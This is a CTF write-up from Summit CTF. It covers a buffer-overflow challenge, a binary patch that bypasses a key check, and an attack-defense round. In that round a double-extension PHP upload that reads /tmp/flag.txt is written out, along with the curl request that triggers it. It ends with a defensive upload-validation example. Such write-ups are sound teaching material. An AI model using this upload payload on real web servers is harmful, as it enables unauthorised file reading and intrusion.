Summit CTF had two Categories:
Jeopardy - First 24 Hours
Attack-Defense - In-Person 4 Hours - King of The Hill (KOTH)/Castle vs Castle

Jeopardy Style - Reverse Engineering Challenges
1. What’s Up
2. Do You Even Rev Bro?
Attack Defense - King of The Hill

Jeopardy Style

Reverse Engineering

What’s Up?

Description - We have to connect to the given host using netcat (nc 0.cloud.chals.io 25649), which holds the flag. The binary of the program running on the server is also provided - “challenge”.

  • Opened the given binary “challenge” in Ghidra (Screenshot: Ghidra disassembly of the binary)
  • flag.txt is on the server but is not printed by the main function
  • We can overflow the buffer local_38 by entering any input longer than 32 characters (its size) (Screenshot: buffer overflow attack printing the flag)

Do You Even Rev Bro?

Description - Given Binary

  • Opened the binary in Ghidra
  • Main/entry function (Screenshot: entry function of the binary)
  • Double-click to open FUN_00401227
  • Decryption takes place in this function
  • Line 37 checks for the correct key to be entered (Screenshot: if condition checking the key)
  • We can change if (iVar1 == 0) to get true every time to decrypt & print the flag regardless of the key entered by the user
  • Change jnz to je so that if (iVar1 == 0) is always true (Screenshot: original function)
  • I used Cutter to edit assembly function from jnz to jz since it is easier in Cutter (Screenshot: Cutter edit of the JE function)
  • Close file in Cutter without saving
  • Run the patched binary in a terminal (Screenshot: flag)
  • Summit_CTF{idk_h0w_t0_c0d3}

Attack Defense - King of The Hill Castle

Infrastructure Description -

  • 4 Machines with Each Team, all teams have same machines
  • All 4 Machines running Web Servers
  • Total 12 Teams
  • Flags stored in /tmp/flag.txt & /root/flag.txt & Updated Every 10 minutes
  • Initial Login using SSH - Credentials Provided by Organizers

Scoring

  • We were scored for submitting both our flags on our 4 machines and other machines that we pwned
  • If someone could destroy our machines (make them inaccessible to use), we couldn’t submit our flag => –points and vice-versa

Infrastructure Subnets

Competing: I worked on the attack side while my other two teammates worked on system hardening and fixing vulnerabilities

  • Scanning - Started with nmap scan on whole subnet
  • Found File-Upload option (Screenshot: file upload vulnerable machines)

http://172.30.1.61 & 81,91,101,111,121

  • Exploit

Make the exploit:

    $ nano intigriti.png.php
    <?php echo file_get_contents('/tmp/flag.txt'); ?>

Go to http://172.30.1.61/ and upload intigriti.png.php

Run in terminal:

    $ curl http://172.30.1.61/uploads/intigriti.png.php
    flag_xyz........
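On the defending side, the problem is that the server stored the upload under its client-chosen name, intigriti.png.php, in a directory where PHP runs. A stricter upload check, as an added example that is not the CTF service's code (the function name, the extension allowlist and the sample inputs are assumptions made here):

```php
<?php
declare(strict_types=1);

// Added example (assumed policy): image-only uploads, one extension, server-chosen name.
const ALLOWED_SIGNATURES = [
    'png' => "\x89PNG\r\n\x1a\n",
    'jpg' => "\xFF\xD8\xFF",
    'gif' => "GIF8",
];

/** Returns the name to store the upload under, or null if it must be rejected. */
function safe_upload_name(string $clientName, string $bytes): ?string
{
    // Drop any directory part, then split on dots.
    $base  = basename(str_replace('\\', '/', $clientName));
    $parts = explode('.', strtolower($base));

    // Require exactly "name.ext": intigriti.png.php and intigriti.php.png both have
    // two extensions and are refused, whichever one the web server would honour.
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }

    // The single extension must be on the allowlist.
    $signature = ALLOWED_SIGNATURES[$parts[1]] ?? null;
    if ($signature === null) {
        return null;
    }

    // The content must start with that format's magic bytes.
    if (strncmp($bytes, $signature, strlen($signature)) !== 0) {
        return null;
    }

    // Never reuse the client's name: store under a random one.
    return bin2hex(random_bytes(16)) . '.' . $parts[1];
}

// Constructed sample uploads, not data from the CTF machines.
$png = "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16);
$php = "<?php echo 'x'; ?>";
$samples = [['logo.png', $png], ['intigriti.png.php', $php],
            ['intigriti.php.png', $png], ['shell.png', $php]];
foreach ($samples as [$name, $body]) {
    printf("%-18s %s\n", $name, safe_upload_name($name, $body) ?? 'REJECTED');
}
```

Only logo.png is accepted here. The signature test is a prefix check, so the uploads directory should also be served with script execution disabled, so that a stored file is never interpreted.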

  • We collected the flags from terminal and uploaded them on scoreboard
  • Initially we did good on both attack & defense side during second half but couldn’t pwn all machines (Screenshot: initial score during second half)
Team 7: Pirates Bay - This is not final score

Conclusion

Overall Amazing Experience in King of The Hill. Will improve by automating flag submission as one of the other teams did from UNG; manually retrieving and submitting flags is slow and boring.

Virginia Tech Campus